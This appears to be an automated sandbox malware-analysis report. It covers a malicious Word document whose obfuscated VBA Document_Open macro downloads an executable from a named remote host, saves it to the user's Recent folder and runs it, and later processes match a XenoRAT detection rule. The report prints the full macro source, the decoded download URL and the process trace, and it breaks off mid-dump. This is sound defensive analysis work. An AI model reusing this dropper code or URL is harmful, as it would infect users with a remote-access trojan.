Imagebase:	0xe90000
File size:	179'712 bytes
MD5 hash:	2003E9B15E1C502B146DAD2E383AC1E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	04:29:52
Start date:	06/12/2024
Path:	C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe
Imagebase:	0xb10000
File size:	169'984 bytes
MD5 hash:	F44302503EA4EEDFA831C25711DF51B7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	04:29:52
Start date:	06/12/2024
Path:	C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe
Imagebase:	0xb10000
File size:	169'984 bytes
MD5 hash:	F44302503EA4EEDFA831C25711DF51B7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	04:29:55
Start date:	06/12/2024
Path:	C:\Windows\System32\taskeng.exe
Wow64 process (32bit):	false
Commandline:	taskeng.exe {4070AE52-7E9D-44E5-8168-5CF4F89E1764} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
Imagebase:	0xff6a0000
File size:	464'384 bytes
MD5 hash:	65EA57712340C09B1B0C427B4848AE05
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	17
Start time:	04:29:55
Start date:	06/12/2024
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe
Imagebase:	0xbe0000
File size:	169'984 bytes
MD5 hash:	F44302503EA4EEDFA831C25711DF51B7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XenoRAT, Description: Yara detected XenoRAT, Source: 00000011.00000002.393953865.0000000002135000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XenoRAT, Description: Yara detected XenoRAT, Source: 00000011.00000002.393953865.0000000002207000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	04:30:00
Start date:	06/12/2024
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe
Imagebase:	0xbe0000
File size:	169'984 bytes
MD5 hash:	F44302503EA4EEDFA831C25711DF51B7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	04:30:00
Start date:	06/12/2024
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe
Imagebase:	0xbe0000
File size:	169'984 bytes
MD5 hash:	F44302503EA4EEDFA831C25711DF51B7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	04:30:00
Start date:	06/12/2024
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe
Imagebase:	0xbe0000
File size:	169'984 bytes
MD5 hash:	F44302503EA4EEDFA831C25711DF51B7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

VBA Code

Call Graph

Graph

Entrypoint
Decryption Function
Executed
Not Executed
Show Help

Module: NewMacros

Declaration

Line	Content
1	Attribute VB_Name = "NewMacros"

Non-Executed Functions

Subroutine
docAPIs: 0, Strings: 0, Number of lines: 2, Relevance: 0.002

Line	Instruction	Meta Information
2	Sub doc()
8	End Sub

Module: ThisDocument

Declaration

Line	Content
1	Attribute VB_Name = "ThisDocument"
2	Attribute VB_Base = "1Normal.ThisDocument"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = True
8	Attribute VB_Customizable = True

Executed Functions

Subroutine
Document_OpenAPIs: 27, Strings: 10, Number of lines: 34, Relevance: 104.034

APIs	Meta Information
Chr
CreateObject	CreateObject("WScript.Shell")
SpecialFolders
TypeText
CreateObject	CreateObject("microsoft.xmlhttp")
CreateObject	CreateObject("Shell.Application")
Part of subcall function pSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCfkxHdqePrNMoVnYd@ThisDocument: Len
Part of subcall function pSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCfkxHdqePrNMoVnYd@ThisDocument: InStr
Part of subcall function pSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCfkxHdqePrNMoVnYd@ThisDocument: Mid
Part of subcall function pSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCfkxHdqePrNMoVnYd@ThisDocument: Mid
Part of subcall function pSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCfkxHdqePrNMoVnYd@ThisDocument: Mid
Open	IXMLHTTPRequest.Open("get","https://www.stipamana.com/sedtryerytsrtyuerthreytwsytysrerter/zgdargaregwaerwgsergtseggs/dfghsgthwstrsrthtghtgh/brtyhdrh.exe",False)
Part of subcall function pSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCfkxHdqePrNMoVnYd@ThisDocument: Len
Part of subcall function pSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCfkxHdqePrNMoVnYd@ThisDocument: InStr
Part of subcall function pSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCfkxHdqePrNMoVnYd@ThisDocument: Mid
Part of subcall function pSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCfkxHdqePrNMoVnYd@ThisDocument: Mid
Part of subcall function pSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCfkxHdqePrNMoVnYd@ThisDocument: Mid
send
responseBody
Status	IXMLHTTPRequest.Status() -> 200
CreateObject	CreateObject("adodb.stream")
Open	Stream.Open()
Type
Write	Stream.Write(?\xfffd\x03\x00\x04\x00?\x00\xfffd\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x00????????????????4???????????$\x00\x00\x00?\x00O\x03??\x00\x00\x00\x00\xfffdAc\x0b?\x02?\x00\x00\x00?\x02 \x00?\x02\x00@ \x00?\x00\x04\x00\x00\x00\x04\x00\x00\x00?\x02?\x00\x00\x00\x02?\x00\x10?\x00\x00\x10?\x00\x00\x00\x10\x00\x00\x00\x00\x00?\x02S\x00?\x02?\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x02\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x08\x00\x00\x00\x00\x00?\x00H\x00\x00\x00\x00\x00??t\x00?\x02 \x00?\x02?\x00\x00\x00\x00\x00\x00\x00 ???c\x00?\x00?\x02?\x00?\x02\x00\x00\x00\x00\x00\x00@????\x00\x0c\x00?\x02?\x00?\x02\x00\x00\x00\x00\x00\x00@?\x00\x00\x00\x00\x00\x00\x00\x00?\x02\x00\x00H\x00\x02\x05?\x02?\x00\x03\x00\x02?\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00??????????????????????????????????????????????????????????????o????????????????????????????????????????????????????????R????????????????????????????????????????????????????E???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????\xfffd???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????j??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????Z??J????????????????????????????????????????j???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????\xfffd????????????????????\xfffd?????????????????????????????????????????????\xfffd?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????U?????????????????????????g????????e??????????????????\xfffd?????????????????????\|?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????j???????????????????????????????????????????????r?????%??????????????????????\x11?????????????????????????????!???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????\xfffd?+????????????????????????????????????????\xfffd?\xfffd????\xfffd??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????c???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????U????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????C??????????????????\x13?????G????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????R??????????????N????L????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????]????????N???????????????????????????????????????????????????K??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????b?L?????????????????????????????????????????????r??N????????????????????????????????????????????????????5?????????????????????????????)
SaveToFile
Close
Open	IShellDispatch6.Open("C:\Users\Albus\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe")

Strings	Decrypted Strings
"200"
"WScript.Shell"
"Recent"
"Please wait....."
"microsoft.xmlhttp"
"Shell.Application"
"get"
"h\xd6\xd6\xd3\xd5://www.\xd5\xd6\xc4\xd3\xc0m\xc0\xc5\xc0.\xc1\xd2m/\xd5\xc2d\xd6\xd4\xdc\xc2\xd4\xdc\xd6\xd5\xd4\xd6\xdc\xd9\xc2\xd4\xd6h\xd4\xc2\xdc\xd6w\xd5\xdc\xd6\xdc\xd5\xd4\xc2\xd4\xd6\xc2\xd4/zgd\xc0\xd4g\xc0\xd4\xc2gw\xc0\xc2\xd4wg\xd5\xc2\xd4g\xd6\xd5\xc2gg\xd5/d\xc3gh\xd5g\xd6hw\xd5\xd6\xd4\xd5\xd4\xd6h\xd6gh\xd6gh/b\xd4\xd6\xdchd\xd4h.\xc2\xdb\xc2"
"adodb.stream"
"adodb.stream"

Line	Instruction	Meta Information
32	Private Sub Document_Open()
33	Dim WshShell as Object	executed
34	Dim JbiIUBSpecialPathTycyt as String
35	Dim kxHdqePrNMoVnYdDepjByUqPHDOgvQDNlgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBw as Integer
36	kxHdqePrNMoVnYdDepjByUqPHDOgvQDNlgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBw = Chr(50) + Chr(48) + Chr(48)	Chr
40	Set WshShell = CreateObject("WScript.Shell")	CreateObject("WScript.Shell") executed
41	JbiIUBSpecialPathTycyt = WshShell.SpecialFolders("Recent")	SpecialFolders
42	Dim TsKVKHBTQoXiokwMNjluRzcsYfyGvbWWVbLELqQCSVYQpSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmr
43	Dim nbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCfkxHdqePrNMoVnYdDepjByUqPHDOgvQDNlgJLrLRZOuDECHf
44	Dim dEYDctTuFzRAXHRXTgwLSUeBwZcIOiqfKGGFJvBJZAzPFIAYChfMBVLCQbJJwxXhtUpTsKVKHBTQoXiokwMNjluRzcsYfyGvb
45	Dim zDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBwZcIOiqfKGGFJvBJZAzPFIAYChfMBVLCQbJJwxXhtUpTsKVKHBT
46	Dim xHdqePrNMoVnYdDepjByUqPHDOgvQDNlgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTg
47	Dim WWVbLELqQCSVYQpSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCf as Integer
48	Dim lgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBwZcIOiqfKGGFJvBJZ
49	Dim cUcGTSjmphFUNxgiCfkxHdqePrNMoVnYdDepjByUqPHDOgvQDNlgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHP
50	WWVbLELqQCSVYQpSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCf = 1
52	ECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBwZcIOiqfKGGFJvBJZAzPFIAYCh = "Please wait....."
53	Selection.TypeText (ECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBwZcIOiqfKGGFJvBJZAzPFIAYCh)	TypeText
56	Set lgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBwZcIOiqfKGGFJvBJZ = CreateObject("microsoft.xmlhttp")	CreateObject("microsoft.xmlhttp") executed
57	Set xHdqePrNMoVnYdDepjByUqPHDOgvQDNlgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTg = CreateObject("Shell.Application")	CreateObject("Shell.Application") executed
59	zDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBwZcIOiqfKGGFJvBJZAzPFIAYChfMBVLCQbJJwxXhtUpTsKVKHBT = JbiIUBSpecialPathTycyt + pSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCfkxHdqePrNMoVnYd("\M\xe2\xe3\xd8\xe2F.\xc2\xdb\xc2")
60	lgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBwZcIOiqfKGGFJvBJZ.Open "get", pSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCfkxHdqePrNMoVnYd("h\xd6\xd6\xd3\xd5://www.\xd5\xd6\xc4\xd3\xc0m\xc0\xc5\xc0.\xc1\xd2m/\xd5\xc2d\xd6\xd4\xdc\xc2\xd4\xdc\xd6\xd5\xd4\xd6\xdc\xd9\xc2\xd4\xd6h\xd4\xc2\xdc\xd6w\xd5\xdc\xd6\xdc\xd5\xd4\xc2\xd4\xd6\xc2\xd4/zgd\xc0\xd4g\xc0\xd4\xc2gw\xc0\xc2\xd4wg\xd5\xc2\xd4g\xd6\xd5\xc2gg\xd5/d\xc3gh\xd5g\xd6hw\xd5\xd6\xd4\xd5\xd4\xd6h\xd6gh\xd6gh/b\xd4\xd6\xdchd\xd4h.\xc2\xdb\xc2"), False	IXMLHTTPRequest.Open("get","https://www.stipamana.com/sedtryerytsrtyuerthreytwsytysrerter/zgdargaregwaerwgsergtseggs/dfghsgthwstrsrthtghtgh/brtyhdrh.exe",False) executed
61	lgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBwZcIOiqfKGGFJvBJZ.send	send
62	nbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCfkxHdqePrNMoVnYdDepjByUqPHDOgvQDNlgJLrLRZOuDECHf = lgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBwZcIOiqfKGGFJvBJZ.responseBody	responseBody
63	If lgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBwZcIOiqfKGGFJvBJZ.Status = 200 Then	IXMLHTTPRequest.Status() -> 200 executed
64	Set TsKVKHBTQoXiokwMNjluRzcsYfyGvbWWVbLELqQCSVYQpSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmr = CreateObject("adodb.stream")	CreateObject("adodb.stream") executed
65	TsKVKHBTQoXiokwMNjluRzcsYfyGvbWWVbLELqQCSVYQpSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmr.Open	Stream.Open() executed
66	TsKVKHBTQoXiokwMNjluRzcsYfyGvbWWVbLELqQCSVYQpSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmr.Type = WWVbLELqQCSVYQpSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCf	Type
67	TsKVKHBTQoXiokwMNjluRzcsYfyGvbWWVbLELqQCSVYQpSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmr.Write nbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCfkxHdqePrNMoVnYdDepjByUqPHDOgvQDNlgJLrLRZOuDECHf	Stream.Write(?\xfffd\x03\x00\x04\x00?\x00\xfffd\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x00????????????????4???????????$\x00\x00\x00?\x00O\x03??\x00\x00\x00\x00\xfffdAc\x0b?\x02?\x00\x00\x00?\x02 \x00?\x02\x00@ \x00?\x00\x04\x00\x00\x00\x04\x00\x00\x00?\x02?\x00\x00\x00\x02?\x00\x10?\x00\x00\x10?\x00\x00\x00\x10\x00\x00\x00\x00\x00?\x02S\x00?\x02?\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x02\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x08\x00\x00\x00\x00\x00?\x00H\x00\x00\x00\x00\x00??t\x00?\x02 \x00?\x02?\x00\x00\x00\x00\x00\x00\x00 ???c\x00?\x00?\x02?\x00?\x02\x00\x00\x00\x00\x00\x00@????\x00\x0c\x00?\x02?\x00?\x02\x00\x00\x00\x00\x00\x00@?\x00\x00\x00\x00\x00\x00\x00\x00?\x02\x00\x00H\x00\x02\x05?\x02?\x00\x03\x00\x02?\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00??????????????????????????????????????????????????????????????o????????????????????????????????????????????????????????R????????????????????????????????????????????????????E???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????\xfffd???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????j??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????Z??J????????????????????????????????????????j???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????\xfffd????????????????????\xfffd?????????????????????????????????????????????\xfffd?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????U?????????????????????????g????????e??????????????????\xfffd?????????????????????\|?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????j???????????????????????????????????????????????r?????%??????????????????????\x11?????????????????????????????!???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????\xfffd?+????????????????????????????????????????\xfffd?\xfffd????\xfffd??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????c???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????U????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????C??????????????????\x13?????G????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????R??????????????N????L????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????]????????N???????????????????????????????????????????????????K??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????b?L?????????????????????????????????????????????r??N????????????????????????????????????????????????????5?????????????????????????????) executed
68	TsKVKHBTQoXiokwMNjluRzcsYfyGvbWWVbLELqQCSVYQpSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmr.SaveToFile zDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBwZcIOiqfKGGFJvBJZAzPFIAYChfMBVLCQbJJwxXhtUpTsKVKHBT, WWVbLELqQCSVYQpSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCf + WWVbLELqQCSVYQpSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCf	SaveToFile
69	TsKVKHBTQoXiokwMNjluRzcsYfyGvbWWVbLELqQCSVYQpSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmr.Close	Close
70	Endif
71	xHdqePrNMoVnYdDepjByUqPHDOgvQDNlgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTg.Open (zDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBwZcIOiqfKGGFJvBJZAzPFIAYChfMBVLCQbJJwxXhtUpTsKVKHBT)	IShellDispatch6.Open("C:\Users\Albus\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe") executed
72	End Sub

Function
pSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCfkxHdqePrNMoVnYdAPIs: 5, Strings: 2, Number of lines: 14, Relevance: 22.014

APIs	Meta Information
Len	Len("\M\xfffd\xfffd\xfffd\xfffdF.\xfffd\xfffd\xfffd") -> 11 Len("h\xfffd\xfffd\xfffd\xfffd://www.\xfffd\xfffd\xfffd\xfffd\xfffdm\xfffd\xfffd\xfffd.\xfffd\xfffdm/\xfffd\xfffdd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffdh\xfffd\xfffd\xfffd\xfffdw\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd/zgd\xfffd\xfffdg\xfffd\xfffd\xfffdgw\xfffd\xfffd\xfffdwg\xfffd\xfffd\xfffdg\xfffd\xfffd\xfffdgg\xfffd/d\xfffdgh\xfffdg\xfffdhw\xfffd\xfffd\xfffd\xfffd\xfffd\xfffdh\xfffdgh\xfffdgh/b\xfffd\xfffd\xfffdhd\xfffdh.\xfffd\xfffd\xfffd") -> 124
InStr	InStr(" ?!@#$%^&()_+\|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\") -> 0 InStr(" ?!@#$%^&()_+\|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","M") -> 68 InStr(" ?!@#$%^&()_+\|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 102 InStr(" ?!@#$%^&()_+\|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 103 InStr(" ?!@#$%^&()_+\|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 106 InStr(" ?!@#$%^&()_+\|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","F") -> 61 InStr(" ?!@#$%^&()_+\|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5",".") -> 52 InStr(" ?!@#$%^&()_+\|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 88 InStr(" ?!@#$%^&()_+\|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 98 InStr(" ?!@#$%^&()_+\|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","h") -> 33 InStr(" ?!@#$%^&()_+\|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 96 InStr(" 